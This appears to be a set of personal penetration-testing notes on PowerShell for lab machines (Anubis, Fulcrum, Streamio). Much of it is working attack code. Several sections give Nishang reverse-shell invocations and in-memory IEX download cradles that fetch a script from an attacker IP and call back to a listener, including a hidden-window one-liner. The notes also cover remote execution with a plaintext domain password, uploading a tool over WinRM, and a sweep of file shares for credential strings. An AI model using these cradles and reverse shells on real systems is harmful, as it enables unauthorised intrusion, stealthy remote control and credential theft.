Powershell Modules

Nishang

To run a script from the Nishang collection on a Windows target, append a call to its function at the very end of the .ps1 file. When the file is downloaded and evaluated, the function is defined first and then executed immediately. For Invoke-PowerShellTcp.ps1 the bottom of the file ends up looking like this:

# tail of Invoke-PowerShellTcp.ps1
------------------------SNIP---------------------------
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}

# appended line: call the function once it has been defined
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.4 -Port 1234

Serve the modified file over HTTP from the attacker host (the URL below has no explicit port, so a web server on port 80) and, with a listener waiting on the port given to -Port, run the following download cradle on the compromised machine. The script is fetched into memory and evaluated, so it never touches disk:

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/Invoke-PowerShellTcp.ps1')

Examples: [[Anubis#^bcdb9e]]

Invoke-Command

Cmdlet (not a module) that runs a script block on a remote machine over PowerShell Remoting (WinRM, TCP 5985, or 5986 with -UseSSL). With explicit credentials:

PS> $Password = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
PS> $Creds = New-Object System.Management.Automation.PSCredential('timelapse.htb\svc_deploy', $Password)
PS> Invoke-Command -ComputerName dc01 -Credential $Creds -ScriptBlock { whoami }

Examples: Fulcrum
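
Added example (not from the page): the same credential object used for a reusable remote session, with a port check first, arguments passed into the script block, and a file copied over the session. The host dc01, the account timelapse.htb\svc_deploy and its password are the values from the notes above; the local file .\tool.ps1 is a placeholder name.

```powershell
# Added example (not from the page): run commands on a remote host over WinRM
# with explicit credentials, keep one session for several commands, and push a
# file into it. Assumptions: dc01, timelapse.htb\svc_deploy and the password are
# the values from the notes; .\tool.ps1 is a placeholder for whatever you upload.
$Password = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$Creds    = New-Object System.Management.Automation.PSCredential('timelapse.htb\svc_deploy', $Password)

# Is the WinRM port even open? Saves a long timeout when it is not.
if (-not (Test-NetConnection -ComputerName dc01 -Port 5985 -InformationLevel Quiet)) {
    throw "dc01 does not expose WinRM on 5985; try -UseSSL (5986) or another way in."
}

# One session reused for several commands (each Invoke-Command -ComputerName call
# would otherwise open and tear down its own session).
$s = New-PSSession -ComputerName dc01 -Credential $Creds

# Local variables are not visible in the remote scope; pass them with -ArgumentList.
$dir = 'C:\Users'
Invoke-Command -Session $s -ScriptBlock {
    param($Path)
    whoami /groups | Select-String 'Administrators'
    Get-ChildItem -Path $Path -Force | Select-Object Name, LastWriteTime
} -ArgumentList $dir

# Copy a file over the existing session (PowerShell 5.0+), then confirm it landed.
Copy-Item -Path .\tool.ps1 -Destination 'C:\Windows\Temp\' -ToSession $s
Invoke-Command -Session $s -ScriptBlock { Get-Item 'C:\Windows\Temp\tool.ps1' }

# The remote session holds a network logon for svc_deploy, so it cannot
# authenticate onward to a third machine (the double-hop problem) without
# CredSSP or delegation; do that work from this host, not from inside the session.
Remove-PSSession $s
```

Building the password with ConvertTo-SecureString -AsPlainText leaves it in the PowerShell history file; when typing interactively, Get-Credential prompts for it instead.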

Get-SMBShare

Lists the SMB shares on the local machine. The three below are the default administrative shares that exist on every Windows host; anything else is a share someone created:

PS C:\Users\BTables\Desktop> Get-SMBShare

Name   ScopeName Path Description  
----   --------- ---- -----------  
ADMIN$ *              Remote Admin 
C$     *              Default share
IPC$   *              Remote IPC

Examples: Fulcrum
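
Added example (not from the page): a function that skips the default administrative shares and reports, for each remaining share, both the share-level ACL and the NTFS ACL of the folder behind it. Effective access is the intersection of the two, so a share that grants Everyone Full Control can still be read-only at the NTFS layer. The optional CIM session parameter (and the New-CimSession call in its comment) is an assumption for querying a remote host with the same cmdlets.

```powershell
# Added example (not from the page): report every non-default share together with
# its share-level ACL and the NTFS ACL of its backing folder. Local by default;
# pass a CIM session to query a remote host (assumed usage:
# New-CimSession -ComputerName dc01 -Credential $Creds).
function Get-ShareReport {
    param([Microsoft.Management.Infrastructure.CimSession]$CimSession)

    $common = @{}
    if ($CimSession) { $common.CimSession = $CimSession }

    # ADMIN$, C$ and IPC$ carry Special = True; skip them and keep the shares someone created.
    Get-SmbShare @common | Where-Object { -not $_.Special } | ForEach-Object {
        $share = $_

        # Share-level permissions: what SMB itself allows before NTFS is consulted.
        Get-SmbShareAccess -Name $share.Name @common | ForEach-Object {
            [pscustomobject]@{
                Share   = $share.Name
                Path    = $share.Path
                Layer   = 'Share'
                Account = $_.AccountName
                Access  = "$($_.AccessControlType):$($_.AccessRight)"
            }
        }

        # NTFS permissions on the folder; Get-Acl has no CimSession, so local only.
        if (-not $CimSession -and $share.Path -and (Test-Path -Path $share.Path)) {
            (Get-Acl -Path $share.Path).Access | ForEach-Object {
                [pscustomobject]@{
                    Share   = $share.Name
                    Path    = $share.Path
                    Layer   = 'NTFS'
                    Account = $_.IdentityReference.Value
                    Access  = "$($_.AccessControlType):$($_.FileSystemRights)"
                }
            }
        }
    }
}

Get-ShareReport | Format-Table -AutoSize
```

Get-SmbShare and Get-SmbShareAccess need the SmbShare module (Windows 8 / Server 2012 and later); on older hosts `net share` and `net share <name>` give the same information in text form.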

Select-String (Search String Pattern)

grep-style search of file contents. Each hit is printed as file:line:text. Here the scripts share is searched for the word Administrator and for a string fragment of interest:

PS X:\fulcrum.local\scripts> Select-String -Path "X:\fulcrum.local\scripts\*.ps1" -Pattern Administrator
PS X:\fulcrum.local\scripts> Select-String -Path "X:\fulcrum.local\scripts\*.ps1" -Pattern 923a

Example: Fulcrum
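
Added example (not from the page): a recursive sweep of a directory tree for credential-looking lines across several file types, with one line of context on each side, reduced to a table of file, line number and the matched text. The root path reuses the share from the notes above; the file types and patterns are my own choices, not anything the page lists.

```powershell
# Added example (not from the page): sweep a directory tree of scripts and config
# files for credential-looking lines. Assumption: the scripts share from the notes
# is mounted at X:\; the extensions and patterns below are illustrative choices.
$Root     = 'X:\fulcrum.local\scripts'
$Types    = '*.ps1', '*.psm1', '*.bat', '*.cmd', '*.vbs', '*.xml', '*.config', '*.ini', '*.txt'
$Patterns = 'password', 'passwd', 'pwd\s*=', 'ConvertTo-SecureString', 'PSCredential', 'Administrator'

Get-ChildItem -Path $Root -Recurse -File -Include $Types -ErrorAction SilentlyContinue |
    Select-String -Pattern $Patterns -Context 1, 1 |
    ForEach-Object {
        # Each hit is a MatchInfo object: Path/LineNumber/Line plus the Context neighbours.
        [pscustomobject]@{
            File   = $_.Path
            Line   = $_.LineNumber
            Match  = $_.Matches[0].Value
            Text   = $_.Line.Trim()
            Before = ($_.Context.PreContext -join ' ').Trim()
            After  = ($_.Context.PostContext -join ' ').Trim()
        }
    } | Format-Table -AutoSize -Wrap

# Select-String is case-insensitive by default; add -CaseSensitive when the
# needle is an exact hash fragment such as 923a. Use -SimpleMatch when the needle
# contains regex metacharacters like $ or ( so it is matched literally.
```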

AD CS

TODO [[Anubis]]

Invoke-PowerShellTcp

To get a reverse shell in PowerShell we can use Nishang's Invoke-PowerShellTcp.ps1; all that is needed is to append the call at the very bottom of the .ps1 file as follows:

# Invoke-PowerShellTCP.ps1
------------------------SNIP---------------------------
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}

# appended line: call the function defined above
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.2 -Port 443 -Rows 37 -Cols 189

The -Rows and -Cols values should match your own terminal so output wraps correctly; run `stty size` on the attacker machine, which prints rows followed by columns.

Then, from the shell we already have, run the following command. It is a download cradle: the script is fetched into memory and evaluated with IEX, so nothing is written to disk and the execution policy (which only governs script files) does not apply:

powershell.exe -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.2/Invoke-PowerShellTcp.ps1')"

Don't forget to start a netcat listener locally on the port given to -Port (443 above) before running the cradle, and to serve the .ps1 from the attacker host on port 80, since the URL names no other port.

Examples: Streamio [[Anubis]]
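
Added example (not from the page and not Nishang's code) covering both the Nishang section above and this one: instead of editing the last line of the file, load the unmodified script into memory and call the function explicitly. IEX evaluates the downloaded text in the current scope, so the function it defines becomes callable afterwards; the common mistake is to load the script and never call the function, after which nothing connects back. The attacker address 10.10.16.2, the web server on port 80 and the listener on TCP 443 are the values from the notes; the proxy handling is an addition for hosts that cannot reach the network directly.

```powershell
# Added example (not from the page or from Nishang): load Invoke-PowerShellTcp.ps1
# into memory and call the function explicitly, so the hosted file needs no editing.
# Assumptions: attacker at 10.10.16.2 hosts the unmodified script on port 80 and
# has a netcat listener on TCP 443 (values from the notes above).
$Attacker = '10.10.16.2'
$Port     = 443
$Url      = "http://$Attacker/Invoke-PowerShellTcp.ps1"

# Honour a system proxy if one is configured; hosts that must go through a proxy
# fail the plain cradle with a connection error.
$wc = New-Object Net.WebClient
$wc.Proxy = [Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [Net.CredentialCache]::DefaultNetworkCredentials

# IEX evaluates the text in the *current* scope: the script only defines the
# function, so after this line it exists but nothing has connected back yet.
IEX $wc.DownloadString($Url)

if (Get-Command Invoke-PowerShellTcp -ErrorAction SilentlyContinue) {
    Invoke-PowerShellTcp -Reverse -IPAddress $Attacker -Port $Port
} else {
    Write-Warning "Invoke-PowerShellTcp was not defined: check that $Url is reachable from this host."
}

# Same thing as a single line from cmd.exe or a non-PowerShell shell
# (-nop = no profile, -w hidden = no visible window):
# powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.2/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.2 -Port 443"
```

Because the call is separate from the load, the same hosted file can be reused against several targets with different -IPAddress/-Port values, and the check with Get-Command tells you immediately whether the download failed rather than leaving you staring at a silent listener.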